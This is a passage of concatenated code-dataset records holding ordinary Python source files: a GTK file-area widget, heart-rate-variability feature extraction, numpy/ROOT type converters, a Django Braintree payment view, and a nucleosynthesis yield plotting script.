None).get_size()\n\n if file_size > 536870912: # 512 Mb\n self._fileview.set_file_path(file_path)\n self._fileview.set_file_size(humanize.naturalsize(file_size))\n self._stack.set_visible_child_name(\"file-area\") # Set view without saving the previous\n self.emit(\"big-file\")\n self.emit(\"file-loaded\")\n self._open_btn.set_sensitive(True)\n self._view_btn.set_visible(False)\n else:\n file.load_contents_async(None, self._open_file_async_complete)\n\n def _open_file_async_complete(self, source_file:GObject.Object, result:Gio.AsyncResult, user_data:GObject.GPointer=None):\n contents = source_file.load_contents_finish(result)\n if not contents[0]:\n self._stack.set_visible_child_name(self._previous_view)\n self.emit(\"error\", _(\"Unable to open {file_path}: {file_content}.\").format(file_path=source_file.peek_path(), file_content=contents[1]))\n return\n\n if Utils.is_text(contents[1]) and self.allow_drag_and_drop:\n text = contents[1].decode(\"utf-8\")\n text_buffer = self._textview.get_buffer()\n text_buffer.set_text(text)\n text_buffer.place_cursor(text_buffer.get_end_iter())\n self._open_btn.set_sensitive(True)\n self._view_btn.set_visible(False)\n self._stack.set_visible_child_name(\"text-area\") # Set view without saving the previous\n self.emit(\"text-changed\")\n elif Utils.is_image(contents[1]) and self.allow_drag_and_drop:\n image_bytes = GLib.Bytes(contents[1])\n texture = Gdk.Texture.new_from_bytes(image_bytes)\n self._file_bytes = image_bytes\n self._fileview.set_file_path(source_file.peek_path())\n self._imageview.set_paintable(texture)\n self._open_btn.set_sensitive(True)\n self._view_btn.set_visible(True)\n self._stack.set_visible_child_name(\"image-area\") # Set view without saving the previous\n self.emit(\"image-loaded\")\n elif self.allow_drag_and_drop:\n self._file_bytes = contents[1]\n file_path = source_file.peek_path()\n file_size = source_file.query_info(\"*\", 0, None).get_size()\n self._fileview.set_file_path(file_path)\n self._fileview.set_file_size(humanize.naturalsize(file_size))\n self._open_btn.set_sensitive(True)\n self._view_btn.set_visible(False)\n self._stack.set_visible_child_name(\"file-area\") # Set view without saving the previous\n self.emit(\"file-loaded\")\n\n def _on_save_clicked(self, user_data:GObject.GPointer):\n\n # Start loading animation and disable save button\n self._save_btn.set_sensitive(False)\n self._loading_lbl.set_label(_(\"Saving file...\"))\n self.set_visible_view(\"loading\")\n\n app = Gio.Application.get_default()\n window = app.get_active_window()\n self._native = Gtk.FileChooserNative(\n transient_for=window,\n title=_(\"Save file as\"),\n action=Gtk.FileChooserAction.SAVE,\n accept_label=_(\"Save\"),\n cancel_label=_(\"Cancel\"),\n )\n self._native.connect(\"response\", self._on_save_response)\n self._native.show()\n\n def _on_save_response(self, dialog:Gtk.NativeDialog, response:int):\n if response == Gtk.ResponseType.ACCEPT:\n self._save_file(dialog.get_file())\n else:\n self._save_btn.set_sensitive(True)\n self._stack.set_visible_child_name(self._previous_view)\n\n self._native = None\n\n def _save_file(self, file:Gio.File):\n\n # If there is nothing to save, return early\n if not self._file_bytes:\n return\n\n file.replace_contents_bytes_async(self._file_bytes, None, False, Gio.FileCreateFlags.NONE, None, self._on_save_file_complete)\n\n def _on_save_file_complete(self, source_file:GObject.Object, result:Gio.AsyncResult, user_data:GObject.GPointer=None):\n res = source_file.replace_contents_finish(result)\n file_path = source_file.peek_path()\n\n self._save_btn.set_sensitive(True)\n self._stack.set_visible_child_name(self._previous_view)\n if not res:\n self.emit(\"error\", _(\"Unable to save {path}\").format(path=file_path))\n return\n\n self.emit(\"saved\", file_path)\n\n def _on_text_changed(self, data):\n self.emit(\"text-changed\")\n\n def _clear(self):\n self._view_btn.set_visible(False)\n self._textview.get_buffer().set_text(\"\")\n self._textview.remove_css_class(\"border-red\")\n self._fileview.set_file_path(\"\")\n self._fileview.set_file_size(\"\")\n self._stack.set_visible_child_name(\"text-area\")\n\n def _on_theme_changed(self, key:str, user_data:GObject.GPointer):\n if Adw.StyleManager.get_default().get_dark():\n style_scheme = GtkSource.StyleSchemeManager().get_default().get_scheme(\"Adwaita-dark\")\n else:\n style_scheme = GtkSource.StyleSchemeManager().get_default().get_scheme(\"Adwaita\")\n self._textview.get_buffer().set_style_scheme(style_scheme)\n\n def get_text(self) -> str:\n text_buffer = self._textview.get_buffer()\n text = text_buffer.get_text(text_buffer.get_start_iter(), text_buffer.get_end_iter(), False)\n return text\n\n def set_text(self, text:str):\n self._textview.get_buffer().set_text(text, -1)\n\n def get_buffer(self) -> GtkSource.Buffer:\n return self._textview.get_buffer()\n\n def set_image(self, image_bytes:GLib.Bytes):\n self._imageview.set_paintable(Gdk.Texture.new_from_bytes(image_bytes))\n self._file_bytes = image_bytes\n\n def set_opened_file(self, file_bytes:List[bytes], file_path:str):\n self._file_bytes = file_bytes\n self._fileview.set_file_path(file_path)\n\n def set_opened_file_path(self, file_path:str):\n self._fileview.set_file_path(file_path)\n\n def get_opened_file_path(self) -> str:\n return self._fileview.get_file_path()\n\n def get_opened_file_size(self) -> str:\n return self._fileview.get_file_size()\n\n def add_css_class(self, css_class_name:str):\n self._textview.add_css_class(css_class_name)\n self._imageview.add_css_class(css_class_name)\n self._fileview.add_css_class(css_class_name)\n\n def remove_css_class(self, css_class_name:str):\n self._textview.remove_css_class(css_class_name)\n self._imageview.remove_css_class(css_class_name)\n self._fileview.remove_css_class(css_class_name)\n\n def get_visible_view(self) -> str:\n return self._stack.get_visible_child_name()\n\n def set_visible_view(self, view_name:str):\n self._previous_view = self._stack.get_visible_child_name()\n self._stack.set_visible_child_name(view_name)\n\n def set_text_language_highlight(self, language:str):\n self._textview.get_buffer().set_language(GtkSource.LanguageManager.get_default().get_language(language))\n\n def set_loading_visible(self, enabled:bool, label:str):\n if enabled:\n self.loading_lbl = label\n self._stack.set_visible_child_name(\"loading\")\n else:\n self._stack.set_visible_child_name(self._previous_view)\n\n def set_spinner_spin(self, enabled: bool):\n self._spinner.set_visible(enabled)\n\n def clear(self):\n self._clear()\n","repo_name":"aleiepure/devtoolbox","sub_path":"src/widgets/text_file_area.py","file_name":"text_file_area.py","file_ext":"py","file_size_in_byte":19183,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"39"} +{"seq_id":"37683963420","text":"# Features based on https://github.com/PGomes92/pyhrv\n# https://pyhrv.readthedocs.io/en/latest/index.html\n\nimport pandas as pd\nimport biosppy\nimport pyhrv.time_domain as td\nimport pyhrv\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nfeature_list = ['_nni_mean', '_nni_min', '_nni_max', '_hr_mean', '_hr_min', '_hr_max', '_hr_std',\n '_nni_diff_mean', '_nni_diff_min', '_nni_diff_max', '_sdnn',\n '_rmssd', '_sdsd', '_nn50', '_pnn50', '_nn20', '_pnn20'\n]\n\n\ndef bvp_features(signals, col_names, hrv_func):\n _features = pd.DataFrame(columns=col_names, index=signals.index)\n for i in range(len(signals)):\n try:\n rpeaks = biosppy.signals.ecg.ecg(signals.iloc[i].tolist(), show=False)[2]\n result = hrv_func(rpeaks=rpeaks)\n _features.iloc[i] = dict(result)\n except:\n print(\"Exception in:\", i)\n continue\n return _features\n\n\"\"\"\ndef bvp_frequency_features(signals):\n _features = pd.DataFrame(columns=['fft_peak_vlf', 'fft_peak_lf', 'fft_peak_hf',\n 'fft_abs_vlf', 'fft_abs_lf', 'fft_abs_hf',\n 'fft_rel_vlf', 'fft_rel_lf', 'fft_rel_hf',\n 'fft_log_vlf', 'fft_log_lf', 'fft_log_hf',\n 'fft_norm_lf', 'fft_norm_hf', 'fft_ratio'], index=signals.index)\n for i in range(len(signals)):\n try:\n result = pyhrv.frequency_domain.frequency_domain(signal=signals.iloc[i].tolist())\n _features.iloc[i]['fft_peak_vlf'] = result[\"fft_peak\"][1]\n plt.close('all')\n except:\n print(\"exception in:\", i)\n continue\n print(_features)\n return _features\n\"\"\"\n\n\ndef extract_features(features, df_data_x, ch_id=\"\"):\n df_features = pd.DataFrame()\n\n if len(features) == 0 or len(set(features) & {'nni_mean', 'nni_min', 'nni_max'}) > 0:\n df_tmp = bvp_features(df_data_x, ['nni_mean', 'nni_min', 'nni_max'], td.nni_parameters)\n df_features = pd.concat([df_features, df_tmp], axis=1)\n if len(features) == 0 or len(set(features) & {'nni_diff_mean', 'nni_diff_min', 'nni_diff_max'}) > 0:\n df_tmp = bvp_features(df_data_x, ['nni_diff_mean', 'nni_diff_min', 'nni_diff_max'], td.nni_differences_parameters)\n df_features = pd.concat([df_features, df_tmp], axis=1)\n if len(features) == 0 or len(set(features) & {'hr_mean', 'hr_min', 'hr_max', 'hr_std'}) > 0:\n df_tmp = bvp_features(df_data_x, ['hr_mean', 'hr_min', 'hr_max', 'hr_std'], td.hr_parameters)\n df_features = pd.concat([df_features, df_tmp], axis=1)\n if len(features) == 0 or len(set(features) & {'sdnn'}) > 0:\n df_tmp = bvp_features(df_data_x, ['sdnn'], td.sdnn)\n df_features = pd.concat([df_features, df_tmp], axis=1)\n if len(features) == 0 or len(set(features) & {'rmssd'}) > 0:\n df_tmp = bvp_features(df_data_x, ['rmssd'], td.rmssd)\n df_features = pd.concat([df_features, df_tmp], axis=1)\n if len(features) == 0 or len(set(features) & {'sdsd'}) > 0:\n df_tmp = bvp_features(df_data_x, ['sdsd'], td.sdsd)\n df_features = pd.concat([df_features, df_tmp], axis=1)\n if len(features) == 0 or len(set(features) & {'nn20', 'pnn20'}) > 0:\n df_tmp = bvp_features(df_data_x, ['nn20', 'pnn20'], td.nn20)\n df_features = pd.concat([df_features, df_tmp], axis=1)\n if len(features) == 0 or len(set(features) & {'nn50', 'pnn50'}) > 0:\n df_tmp = bvp_features(df_data_x, ['nn50', 'pnn50'], td.nn50)\n df_features = pd.concat([df_features, df_tmp], axis=1)\n\n tmp_cols = df_features.columns\n df_features.columns = [ch_id + \"_\" + name for name in tmp_cols]\n\n print('--- BVP features ---')\n print(df_features.shape)\n return df_features\n","repo_name":"franslom/feature_contribution","sub_path":"server/features/BVP_feature_extract.py","file_name":"BVP_feature_extract.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"73486361395","text":"#!/usr/bin/env python\n\n\"\"\"Define converters to convert between Python (numpy) and C++ (std::vecotr, Eigen, etc) types\nImplements individual converters along with generic 'convert' function.\"\"\"\n\nfrom load import ROOT as R\nimport numpy as N\nfrom collections import defaultdict\nfrom inspect import getmro\nfrom gna import context\n\n# List all converters in dict: converters['from']['to']\nconverters = defaultdict( dict )\n\n# Add nicknames for types\nnicknames = {\n R.vector: 'stdvector',\n R.Points: 'points',\n R.TMatrixD: 'tmatrixd',\n R.TMatrixF: 'tmatrixf',\n # R.Eigen.MatrixXd: 'eigenmatrix',\n # R.Eigen.VectorXd: 'eigenvector',\n # R.Eigen.ArrayXd: 'eigenarray',\n # R.Eigen.ArrayXXd: 'eigenarray2d',\n N.ndarray: 'array',\n N.matrixlib.defmatrix.matrix: 'matrix',\n }\n\ndef convert(obj, totype, debug=False, **kwargs):\n \"\"\"Converto object obj to type totype.\n The converter is chosen from gna.converters dictionary based on the type(obj) or one of it's base classes.\n\n :obj: object to convert\n :totype: the target type\n\n Order:\n 1. Set type to type(obj).\n 2. Try to find converter for the current type. Return if found.\n 3. Try to find 'base' converter for the current type. Convert obj to base and return convert(newobj) if 'base' converter found.\n 4. Set type to next base type of obj. Repeat from 2.\n\n Example:\n convert( N.array([1, 2, 3]), R.vector('double') )\n convert( N.array([1, 2, 3]), R.vector, dtype='double' )\n \"\"\"\n\n def msg( title, converter=None ):\n res = title\n if converter:\n res+= ' '+converter.__name__\n typestr = isinstance(totype, str) and totype or totype.__name__\n res+=\" to convert '{0}' ({1}) to '{2}'\".format(\n type(obj).__name__,\n ', '.join([base.__name__ for base in bases]),\n typestr\n )\n if kwargs:\n res+=' [kwargs: %s]'%( str( kwargs ) )\n\n return res\n\n bases = getmro(type(obj))\n for base in bases:\n bconverters = converters.get( base )\n if not bconverters:\n continue\n converter = bconverters.get( totype )\n if converter:\n break\n\n if 'base' in bconverters:\n if debug:\n print( 'Convert', type(obj).__name__, 'to base' )\n return convert( bconverters['base'](obj), totype, debug, **kwargs )\n else:\n raise Exception(msg('Can not find converter'))\n\n if debug:\n print( msg( 'Using converter', converter ) )\n return converter( obj, **kwargs )\n\ndef save_converter( from_type, to_type ):\n \"\"\"Make a decorator to store converter in a converters dictionary based on from/to types\"\"\"\n def decorator( converter ):\n fts, tts = [from_type], [to_type]\n if from_type in nicknames:\n fts.append( nicknames[from_type] )\n if to_type in nicknames:\n tts.append( nicknames[to_type] )\n for ft in fts:\n for tt in tts:\n converters[ft][tt] = converter\n return converter\n return decorator\n\ndef get_cpp_type( array ):\n \"\"\"Guess appropriate C++ type to store data based on array.dtype or type\"\"\"\n if len(array)==0:\n raise Exception('Unable to determine type of the elements of the empty array')\n if hasattr( array, 'dtype' ):\n typemap = {\n 'int32': 'int',\n 'float64': 'double',\n 'float32': 'float',\n # 'uint64': 'size_t',\n }\n atype = array.dtype.name\n else:\n typemap = {\n int: 'int',\n float: context.current_precision(),\n str: 'std::string',\n 'int': 'int',\n 'float': context.current_precision(),\n 'str': 'std::string',\n 'variable': 'variable',\n 'variable': 'variable',\n }\n atype = type( array[0] ).__name__\n ret = typemap.get( atype )\n if not ret:\n raise Exception( 'Do not know how to convert type '+str(atype) )\n return ret\n\n@save_converter( list, R.vector )\ndef list_to_stdvector( lst, dtype='auto' ):\n \"\"\"Convert a list to the std::vector\"\"\"\n if dtype=='auto':\n dtype = get_cpp_type( lst )\n ret = R.vector(dtype)()\n ret.reserve(len(lst))\n for v in lst:\n ret.push_back(v)\n return ret\n\n@save_converter( N.ndarray, R.vector )\ndef array_to_stdvector( array, dtype='auto' ):\n \"\"\"Convert an array to the std::vector\"\"\"\n if dtype=='auto':\n dtype = get_cpp_type( array )\n ret = R.vector(dtype)( len( array ) )\n for i, v in enumerate( array ):\n ret[i] = v\n return ret\n\n@save_converter( N.ndarray, R.vector('double') )\ndef array_to_stdvector_double( array ):\n \"\"\"Convert an array to the std::vector\"\"\"\n return array_to_stdvector( array, 'double' )\n\n@save_converter( N.ndarray, R.vector('size_t') )\ndef array_to_stdvector_size_t( array ):\n \"\"\"Convert an array to the std::vector\"\"\"\n return array_to_stdvector( array, 'size_t' )\n\n@save_converter( N.ndarray, R.vector('int') )\ndef array_to_stdvector_int( array ):\n \"\"\"Convert an array to the std::vector\"\"\"\n return array_to_stdvector( array, 'int' )\n\ndef stdvector_to_array( vector, dtype=None ):\n \"\"\"Convert an std::vector to numpy.array\"\"\"\n return N.array( vector, dtype=dtype )\n\n@save_converter( R.vector('int'), N.ndarray )\ndef stdvector_to_array_int( vector ):\n \"\"\"Convert std::vector to array of int\"\"\"\n return stdvector_to_array( vector, 'i' )\n\n@save_converter( R.vector('double'), N.ndarray )\ndef stdvector_to_array_double( vector ):\n \"\"\"Convert std::vector to array of double\"\"\"\n return stdvector_to_array( vector, 'd' )\n\n@save_converter( R.vector('float'), N.ndarray )\ndef stdvector_to_array_float( vector ):\n \"\"\"Convert std::vector to array of double\"\"\"\n return stdvector_to_array( vector, 'f' )\n\n@save_converter( R.vector('size_t'), N.ndarray )\ndef stdvector_to_array_double( vector ):\n \"\"\"Convert std::vector to array of double\"\"\"\n return stdvector_to_array( vector, 'u8' )\n\n@save_converter( N.matrixlib.defmatrix.matrix, 'base' )\ndef matrix_to_array( matrix ):\n \"\"\"Convert numpy matrix to array\"\"\"\n return matrix.A\n\n@save_converter( N.ndarray, R.Points )\ndef array_to_Points( array ):\n \"\"\"Convert numpy array to Points\"\"\"\n if len(array.shape)>2:\n raise Exception( 'Can convert only 1- and 2- dimensional arrays' )\n if array.dtype != 'float64':\n array = array.astype('float64')\n a = array.ravel( order='F' )\n s = array_to_stdvector_size_t( array.shape )\n return R.Points( a, s )\n\n# @save_converter( N.ndarray, R.Eigen.MatrixXd )\n# def array_to_eigenmatrix( array ):\n # \"\"\"Convert numpy array to Eigen::MatrixXd\"\"\"\n # if len(array.shape)!=2:\n # raise Exception( 'Can not convert arrays with shape %s tor MatrixXd'%( str(array.shape) ) )\n # return R.Eigen.MatrixXd(R.Eigen.Map('Eigen::MatrixXd')( array.ravel( order='F' ), *array.shape ))\n\n# @save_converter( N.ndarray, R.Eigen.ArrayXXd )\n# def array_to_eigenarray2d( array ):\n # \"\"\"Convert numpy array to Eigen::ArrayXXd\"\"\"\n # if len(array.shape)!=2:\n # raise Exception( 'Can not convert arrays with shape %s tor ArrayXXd'%( str(array.shape) ) )\n # return R.Eigen.ArrayXXd(R.Eigen.Map('Eigen::ArrayXXd')( array.ravel( order='F' ), *array.shape ))\n\n# @save_converter( N.ndarray, R.Eigen.VectorXd )\n# def array_to_eigenvector( array ):\n # \"\"\"Convert numpy array to Eigen::MatrixXd\"\"\"\n # if len(array.shape)!=2 or array.shape[1]!=1:\n # raise Exception( 'Can not convert arrays with shape %s tor VectorXd'%( str(array.shape) ) )\n # return R.Eigen.MatrixXd(R.Eigen.Map('Eigen::MatrixXd')( array.ravel( order='F' ), *array.shape ))\n\n# @save_converter( N.ndarray, R.Eigen.ArrayXd )\n# def array_to_eigenarray( array ):\n # \"\"\"Convert numpy array to Eigen::ArrayXd\"\"\"\n # if len(array.shape)!=1:\n # raise Exception( 'Can not convert arrays with shape %s tor ArrayXd'%( str(array.shape) ) )\n # return R.Eigen.ArrayXd(R.Eigen.Map('Eigen::ArrayXd')( array.ravel( order='F' ), array.shape[0] ))\n\n# #\n# # Eigen\n# #\n# @save_converter( R.Eigen.MatrixXd, N.ndarray )\n# @save_converter( R.Eigen.VectorXd, N.ndarray )\n# @save_converter( R.Eigen.ArrayXXd, N.ndarray )\n# def eigen_to_array( array ):\n # \"\"\"Convert Eigen::MatrixXd/Eigen::VectorXd/Eigen::ArrayXXd to numpy array\"\"\"\n # return N.frombuffer( array.data(), dtype='d', count=array.size() ).reshape( array.rows(), array.cols(), order='F' )\n\n# @save_converter( R.Eigen.MatrixXd, N.matrixlib.defmatrix.matrix )\n# @save_converter( R.Eigen.VectorXd, N.matrixlib.defmatrix.matrix )\n# @save_converter( R.Eigen.ArrayXXd, N.matrixlib.defmatrix.matrix )\n# def eigen_to_matrix( array ):\n # \"\"\"Convert Eigen::MatrixXd/Eigen::VectorXd/Eigen::ArrayXXd to numpy matrix\"\"\"\n # return N.matrix( eigen_to_array( array ) )\n\n# @save_converter( R.Eigen.ArrayXd, N.ndarray )\n# def eigenarray_to_array( array ):\n # \"\"\"Convert Eigen::ArrayXd to numpy array\"\"\"\n # return N.frombuffer( array.data(), dtype='d', count=array.size() )\n\n# @save_converter( R.Eigen.ArrayXd, N.matrixlib.defmatrix.matrix )\n# def eigenarray_to_matrix( array ):\n # \"\"\"Convert Eigen::ArrayXd to numpy matrix\"\"\"\n # return N.matrix( eigenarray_to_array( array ) )\n\n#\n# ROOT\n#\n@save_converter( R.TMatrixD, N.ndarray )\n@save_converter( R.TMatrixF, N.ndarray )\ndef tmatrix_to_array( m ):\n \"\"\"Converto TMatrix* to numpy array\"\"\"\n cbuf = m.GetMatrixArray()\n return N.frombuffer( cbuf, N.dtype( cbuf.typecode ), m.GetNoElements() ).reshape( m.GetNrows(), m.GetNcols() )\n\n@save_converter( N.ndarray, R.TMatrixF )\ndef array_to_tmatrixd( arr, **kwargs ):\n \"\"\"Converto numpy array to TMatrixF\"\"\"\n return R.TMatrixF( arr.shape[0], arr.shape[1], N.ascontiguousarray(arr, dtype='f').ravel() )\n\n@save_converter( N.ndarray, R.TMatrixD )\ndef array_to_tmatrixd( arr, **kwargs ):\n \"\"\"Converto numpy array to TMatrixD\"\"\"\n return R.TMatrixD( arr.shape[0], arr.shape[1], N.ascontiguousarray(arr, dtype='d').ravel() )\n\n@save_converter( N.ndarray, 'tmatrix' )\ndef array_to_tmatrixd( arr, **kwargs ):\n \"\"\"Converto numpy array to TMatrixD\"\"\"\n if arr.dtype==N.double:\n cls = R.TMatrixD\n elif arr.dtype==N.float32:\n cls = R.TMatrixF\n else:\n raise Exception( 'Do not know how to convert %s to TMatrix'%( str(arr.dtype) ) )\n return cls( arr.shape[0], arr.shape[1], arr.ravel() )\n","repo_name":"gnafit/gna","sub_path":"pylib/gna/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":10789,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"25478241749","text":"from django.shortcuts import render, redirect, get_object_or_404\nimport braintree\nfrom events.models import OrderTickets, EventTickets\nfrom django.contrib.auth.decorators import login_required\nfrom events.tasks import send_tickets\n\n@login_required\ndef payment_process(request):\n order_id = request.session.get('order_id')\n order = get_object_or_404(OrderTickets, id = order_id)\n \n if request.method == 'POST':\n # Get token\n nonce = request.POST.get('payment_method_nonce', None)\n \n # Creating and sending transaction\n result = braintree.Transaction.sale({\n 'amount': '{:.2f}'.format(order.total_price),\n 'payment_method_nonce': nonce,\n 'options': {\n 'submit_for_settlement': True\n }\n })\n # Success payment\n if result.is_success:\n order.paid = True\n order.included = True\n order.braintree_id = result.transaction.id\n order.save()\n send_tickets(order.id)\n return redirect('payment:done')\n \n # Payment not successful\n else:\n # Adding unpurchased tickets\n if not order.included:\n for ticket in order.order.all():\n event_ticket = get_object_or_404(EventTickets, id=ticket.event_ticket.id)\n event_ticket.number += ticket.quantity\n event_ticket.save()\n order.included = True\n order.save()\n return redirect('payment:canceled')\n else:\n client_token = braintree.ClientToken.generate()\n return render(request,\n 'payment/process.html',\n {'order': order,\n 'client_token': client_token})\n\n\n@login_required\ndef payment_done(request):\n return render(request, 'payment/done.html')\n\n@login_required\ndef payment_canceled(request):\n return render(request, 'payment/canceled.html')","repo_name":"damian0s10/Online-Ticketing-System","sub_path":"payment/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35244647306","text":"from __future__ import division\nfrom sys import path\npath.append('modules/')\n\nfrom _curses import raw\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom matplotlib import ticker\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\nimport scivis.units as ut # for tmerg\nimport statsmodels.formula.api as smf\nfrom math import pi, log10, sqrt\nimport scipy.optimize as opt\nimport matplotlib as mpl\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport os.path\nimport cPickle\nimport time\nimport copy\nimport h5py\nimport csv\nimport os\n\nfrom scidata.utils import locate\nimport scidata.carpet.hdf5 as h5\nimport scidata.xgraph as xg\n\nfrom matplotlib.ticker import AutoMinorLocator, FixedLocator, NullFormatter, \\\n MultipleLocator\nfrom matplotlib.colors import LogNorm, Normalize\nfrom matplotlib.colors import Normalize, LogNorm\n\nfrom general import *\nfrom lists import *\nfrom filework import *\nfrom units import time_constant, volume_constant, energy_constant\n\n\nclass SIM_NUCLEO:\n\n def __init__(self, sim, extension='_0'):\n\n self.sim = sim\n\n self.outflowdir = MakePath.outflow(sim, extension)\n self.path = self.outflowdir + 'yields.h5'\n\n # @staticmethod\n # def normalize_yields(As, Ys):\n # Anrm = np.arange(As.max() + 1)\n # Ynrm = np.zeros(int(As.max()) + 1)\n # for i in range(Ynrm.shape[0]): # changed xrange to range\n # Ynrm[i] = Ys[As == i].sum()\n # return Anrm, Ynrm\n\n def load_res(self):\n\n h5tbl = h5py.File(self.path, \"r\")\n ye_final = np.array(h5tbl[\"Y_final\"])\n a_arr = np.array(h5tbl[\"A\"])\n z_arr = np.array(h5tbl[\"Z\"])\n h5tbl.close()\n\n return a_arr, ye_final, z_arr\n\n # def from_res(self, normalize=True):\n #\n # ye_final, a_arr, z_arr = self.load_res()\n #\n # if normalize == True:\n # a_arr, ye_final = self.normalize_yields(a_arr, ye_final)\n # norm = ye_final.sum()\n # ye_final /= norm\n # return ye_final, a_arr, z_arr\n\n # def from_res_norm_to_sol(self, element_a, a_sol, ye_sol):\n #\n # if len(a_sol) == 0: raise ValueError('No solar arrays prvided')\n #\n # ye_final, a_arr, z_arr = self.load_res()\n # a_arr, ye_final = self.normalize_yields(a_arr, ye_final)\n #\n # if element_a not in a_sol: raise ValueError('Element: a:{} not in solar A'.format(element_a, a_sol))\n # if element_a not in a_arr: raise ValueError('Element: a:{} not in a_arr'.format(element_a, a_arr))\n #\n # delta = np.float(ye_sol[np.where(a_sol == element_a)] / ye_final[np.where(a_arr == element_a)])\n #\n #\n # print(a_sol[np.where(a_sol == element_a)])\n # print(a_arr[np.where(a_sol == element_a)])\n # print('delta:{}'.format(delta))\n # ye_final *= delta\n # # # print(a_sol)\n # # # print(ye_final)\n # # exit(1)\n #\n # return ye_final, a_arr\n\n @staticmethod\n def sum_for_all_charge_z(As, Ys):\n '''Sums all Ys for a given A (for all Z)'''\n Anrm = np.arange(As.max() + 1)\n Ynrm = np.zeros(int(As.max()) + 1)\n for i in range(Ynrm.shape[0]): # changed xrange to range\n Ynrm[i] = Ys[As == i].sum()\n return Anrm, Ynrm\n\n @staticmethod\n def normalize_yields_to_sum(a_arr, ye_final):\n ''' Normalizes to a sum of all A '''\n norm = ye_final.sum()\n ye_final /= norm\n return a_arr, ye_final\n\n def normalize_yields_to_a(self, element_a, a_arr, ye_final):\n\n a_sol, ye_sol = self.solar()\n\n if element_a not in a_sol: raise ValueError('Element: a:{} not in solar A'.format(element_a, a_sol))\n if element_a not in a_arr: raise ValueError('Element: a:{} not in a_arr'.format(element_a, a_arr))\n\n delta = np.float(ye_sol[np.where(a_sol == element_a)] / ye_final[np.where(a_arr == element_a)])\n\n # print(a_sol[np.where(a_sol == element_a)])\n # print(a_arr[np.where(a_sol == element_a)])\n # print('delta:{}'.format(delta))\n ye_final *= delta\n # print(a_sol)\n # print(ye_final)\n # exit(1)\n # print(a_arr)\n # print(ye_final)\n\n return a_arr, ye_final\n\n def load_from_outflow(self, normalization=None):\n\n a_arr, ye_final, z_arr = self.load_res() # ~8000 entries, 1D array, for Z and A\n a_arr, ye_final = self.sum_for_all_charge_z(a_arr, ye_final) # ~200 entries, 1D 1 arrays\n\n # normalization options\n if normalization == 'sum':\n return self.normalize_yields_to_sum(a_arr, ye_final)\n elif normalization == None:\n return a_arr, ye_final\n else:\n a_to_norm = int(normalization)\n if a_to_norm < a_arr.min():\n raise ValueError('Give normalization A:{} is < a_arr.min():{}'.format(a_to_norm, a_arr.min()))\n if a_to_norm > a_arr.max():\n raise ValueError('Give normalization A:{} is > a_arr.max():{}'.format(a_to_norm, a_arr.max()))\n return self.normalize_yields_to_a(a_to_norm, a_arr, ye_final)\n\n def solar(self):\n\n Asun, Ysun = np.loadtxt(Paths.skynet + Files.solar_r, unpack=True)\n Asun, Ysun = self.sum_for_all_charge_z(Asun, Ysun)\n Ysun /= np.sum(Ysun)\n\n return Asun, Ysun\n\nclass PLOT_NUCLEO:\n\n def __init__(self):\n\n # self.task_dic = {'sims': ['DD2_M13641364_M0_SR']#, 'DD2_M13641364_M0_SR'], # corr_vn1\n # 'criteria': ['geo']#, 'bern wind'], # /_b_w/corr_vn1_vn2\n # 'det': [0]#, 0], # /outflowed_0_b_w/corr_vn1_vn2\n # 'norm': ['195']#, 'sum'],\n # 'labels': ['']#, ''],\n # 'colors': ['blue']#, 'red'],\n # 'yscale': 'log',\n # }\n\n self.task_dic = {'sims': ['DD2_M13641364_M0_SR', 'SLy4_M13641364_M0_SR', 'LS220_M13641364_M0_SR', 'SFHo_M13641364_M0_SR'],#, 'DD2_M13641364_M0_SR'], # corr_vn1\n 'extension': ['_0', '_0', '_0', '_0'],#, 'bern wind'], # /_b_w/corr_vn1_vn2 # /outflowed_0_b_w/corr_vn1_vn2\n 'norm': ['195', '195', '195', '195'],#, 'sum'],\n 'labels': ['DD2', 'SLy4', \"LS220\", 'SFHo'],#, ''],\n 'colors': ['blue', 'green', 'orange', 'red'],#, 'red'],\n 'yscale': 'log',\n }\n self.fig_name = 'yields'\n self.plot_solar = True\n\n def plot_from_dic(self):\n\n n_rows = 1\n n_cols = 1\n\n fig = plt.figure(figsize=(6.5, 3.6)) # figsize=(4.5, 2.5 * 3.6) # (<->; v)\n\n axs = []\n for n in range(1, n_rows + 1):\n if n == 1:\n axs.append(fig.add_subplot(n_rows, n_cols, n))\n else:\n axs.append(fig.add_subplot(n_rows, n_cols, n, sharex=axs[n - 2])) # sharex=axs[n - 2]))\n\n for i_sim, sim in enumerate(self.task_dic['sims']):\n\n cl_nuc = SIM_NUCLEO(sim, self.task_dic['extension'][i_sim])\n\n if self.plot_solar:\n a_sol, y_sol = cl_nuc.solar()\n axs[0].plot(a_sol, y_sol, '.', color='black')\n\n a_arr, ye_final = cl_nuc.load_from_outflow(self.task_dic['norm'][i_sim])\n axs[0].step(a_arr, ye_final, label=self.task_dic['labels'][i_sim], color=self.task_dic['colors'][i_sim])\n\n axs[0].legend(loc='best', numpoints=1)\n if self.task_dic['yscale'] == 'log':\n axs[0].set_yscale(\"log\")\n axs[0].tick_params(labelsize=12)\n axs[0].set_ylabel(\"Relative final abundances\", fontsize=12)\n\n\n plt.ylim(ymin=1e-5, ymax=2e-1)\n plt.xlim(xmin=50, xmax=210)\n # plt.ylabel(\"Relative final abundances\")\n plt.xlabel(\"A\", fontsize=12)\n # plt.yscale(\"log\")\n plt.tick_params(axis='both', which='both', labelleft=True, labelright=False, tick1On=True, tick2On=True,\n labelsize=12, direction='in') # labeltop\n # plt.xticks(fontsize=12)\n # plt.yticks(fontsize=12)\n\n plt.minorticks_on()\n plt.savefig('{}{}.png'.format(Paths.plots, self.fig_name), bbox_inches='tight') # , dpi=128\n plt.close()\n\nif __name__ == '__main__':\n\n ''' PLOT YIELDS '''\n pl_cl = PLOT_NUCLEO()\n pl_cl.plot_from_dic()\n 